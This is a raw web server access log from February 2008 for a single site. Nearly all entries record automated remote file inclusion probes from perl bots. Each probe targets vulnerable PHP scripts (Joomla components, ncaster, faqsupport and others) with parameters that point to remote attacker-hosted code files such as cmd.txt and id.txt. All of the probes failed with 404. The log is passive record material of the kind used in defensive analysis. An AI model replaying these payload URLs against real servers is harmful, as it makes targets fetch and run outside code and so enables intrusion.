66.135.33.135 - - [24/Feb/2008:05:08:13 -0800] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
81.169.132.236 - - [24/Feb/2008:05:08:19 -0800] "GET /logs/access_080127.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.186.169.183 - - [24/Feb/2008:05:08:22 -0800] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
208.186.169.183 - - [24/Feb/2008:05:08:22 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
208.186.169.183 - - [24/Feb/2008:05:08:23 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
208.186.169.183 - - [24/Feb/2008:05:08:46 -0800] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:05:09:30 -0800] "GET /logs/access_080107.log//send_reminders.php?includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:05:09:32 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:05:09:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.19.105 - - [24/Feb/2008:05:09:32 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.111.176.57 - - [24/Feb/2008:05:09:41 -0800] "GET /logs/scripts.log/index.php3?s=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.57 - - [24/Feb/2008:05:09:41 -0800] "GET /index.php3?s=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.57 - - [24/Feb/2008:05:09:42 -0800] "GET /logs/index.php3?s=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.144.55.219 - - [24/Feb/2008:05:09:54 -0800] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.144.55.219 - - [24/Feb/2008:05:09:54 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.144.55.219 - - [24/Feb/2008:05:09:55 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.144.55.219 - - [24/Feb/2008:05:10:36 -0800] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:05:10:43 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:05:10:43 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:05:10:43 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:05:10:43 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:05:10:44 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:05:10:44 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:05:10:46 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:05:10:46 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:05:10:46 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:05:10:46 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:05:10:47 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
61.14.187.140 - - [24/Feb/2008:05:10:47 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
89.111.176.57 - - [24/Feb/2008:05:10:49 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
218.189.208.72 - - [24/Feb/2008:05:10:56 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
218.189.208.72 - - [24/Feb/2008:05:10:57 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
218.189.208.72 - - [24/Feb/2008:05:10:57 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
218.189.208.72 - - [24/Feb/2008:05:10:57 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
218.189.208.72 - - [24/Feb/2008:05:10:57 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
218.189.208.72 - - [24/Feb/2008:05:10:58 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
207.87.60.4 - - [24/Feb/2008:05:11:21 -0800] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
207.87.60.4 - - [24/Feb/2008:05:11:21 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
207.87.60.4 - - [24/Feb/2008:05:11:21 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
207.87.60.4 - - [24/Feb/2008:05:11:40 -0800] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
89.111.176.57 - - [24/Feb/2008:05:12:13 -0800] "GET /logs/access_080211.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.57 - - [24/Feb/2008:05:12:14 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.57 - - [24/Feb/2008:05:12:14 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
158.36.103.2 - - [24/Feb/2008:05:15:32 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.toulouseangloexchange.com"
158.36.103.2 - - [24/Feb/2008:05:15:32 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.toulouseangloexchange.com"
158.36.103.2 - - [24/Feb/2008:05:15:33 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.toulouseangloexchange.com"
158.36.103.2 - - [24/Feb/2008:05:15:33 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
158.36.103.2 - - [24/Feb/2008:05:15:38 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.toulouseangloexchange.com"
158.36.103.2 - - [24/Feb/2008:05:15:38 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
201.217.93.91 - - [24/Feb/2008:05:16:59 -0800] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
208.79.234.84 - - [24/Feb/2008:05:17:03 -0800] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://h1.ripway.com/alat/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.79.234.84 - - [24/Feb/2008:05:17:04 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://h1.ripway.com/alat/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.79.234.84 - - [24/Feb/2008:05:17:04 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://h1.ripway.com/alat/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
201.217.93.91 - - [24/Feb/2008:05:17:13 -0800] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
201.217.93.91 - - [24/Feb/2008:05:17:27 -0800] "GET /logs/access_080204.log/modules/coppermine/themes/default/theme.php?THEME_DIR=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
205.212.166.193 - - [24/Feb/2008:05:17:32 -0800] "GET /logs/access_071022.log/help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
205.212.166.193 - - [24/Feb/2008:05:17:32 -0800] "GET /help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
205.212.166.193 - - [24/Feb/2008:05:17:32 -0800] "GET /logs/help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
67.195.44.107 - - [24/Feb/2008:05:17:34 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
67.195.44.82 - - [24/Feb/2008:05:17:34 -0800] "GET /logs/access.log HTTP/1.0" 200 40960 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
208.79.234.84 - - [24/Feb/2008:05:17:35 -0800] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://h1.ripway.com/alat/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
75.125.10.2 - - [24/Feb/2008:05:18:07 -0800] "GET /logs/access_080114.log//modules/vwar/convert/mvcw_conver.php?http://www.cafesci-van.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
75.125.10.2 - - [24/Feb/2008:05:18:08 -0800] "GET //modules/vwar/convert/mvcw_conver.php?http://www.cafesci-van.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
75.125.10.2 - - [24/Feb/2008:05:18:08 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?http://www.cafesci-van.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.212.166.193 - - [24/Feb/2008:05:18:23 -0800] "GET /logs/access_071119.log/help.php?id=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
75.125.10.2 - - [24/Feb/2008:05:18:43 -0800] "GET /logs/access_080211.log//modules/vwar/convert/mvcw_conver.php?http://www.cafesci-van.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.30.216.8 - - [24/Feb/2008:05:19:47 -0800] "GET /logs/access_071126.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
203.86.232.194 - - [24/Feb/2008:05:21:22 -0800] "GET /logs/access_080127.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
203.86.232.194 - - [24/Feb/2008:05:21:22 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
203.86.232.194 - - [24/Feb/2008:05:21:23 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
218.188.2.141 - - [24/Feb/2008:05:22:39 -0800] "GET /logs/access_071231.log/modules/My_eGallery/index.php?basepath=http://www.avisosgratis.com.ar/data/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
218.188.2.141 - - [24/Feb/2008:05:22:40 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.avisosgratis.com.ar/data/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.15.190.12 - - [24/Feb/2008:05:23:02 -0800] "GET /logs/access.log//path/templates/default/header.inc.php?menu=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.15.190.12 - - [24/Feb/2008:05:23:03 -0800] "GET //path/templates/default/header.inc.php?menu=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.15.190.12 - - [24/Feb/2008:05:23:03 -0800] "GET /logs//path/templates/default/header.inc.php?menu=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.160.42.74 - - [24/Feb/2008:05:27:10 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.160.42.74 - - [24/Feb/2008:05:27:10 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:05:29:28 -0800] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:05:29:28 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:05:29:29 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
208.186.169.183 - - [24/Feb/2008:05:30:45 -0800] "GET /logs/access_071231.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
208.186.169.183 - - [24/Feb/2008:05:30:45 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
208.186.169.183 - - [24/Feb/2008:05:30:46 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
124.217.247.166 - - [24/Feb/2008:05:30:49 -0800] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
66.135.33.135 - - [24/Feb/2008:05:31:00 -0800] "GET /logs/access_080114.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.135.33.135 - - [24/Feb/2008:05:31:00 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.135.33.135 - - [24/Feb/2008:05:31:00 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:32:12 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071210.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:32:12 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:32:12 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071210.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:32:12 -0800] "GET /logs/%3Cwbr%20/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:32:12 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:32:12 -0800] "GET /logs/%3Cwbr%20/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:32:23 -0800] "GET /logs/access_071210.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.229.88 - - [24/Feb/2008:05:32:23 -0800] "GET /logs/access_071210.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cartographia.org/ftp/files/source/TaN? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
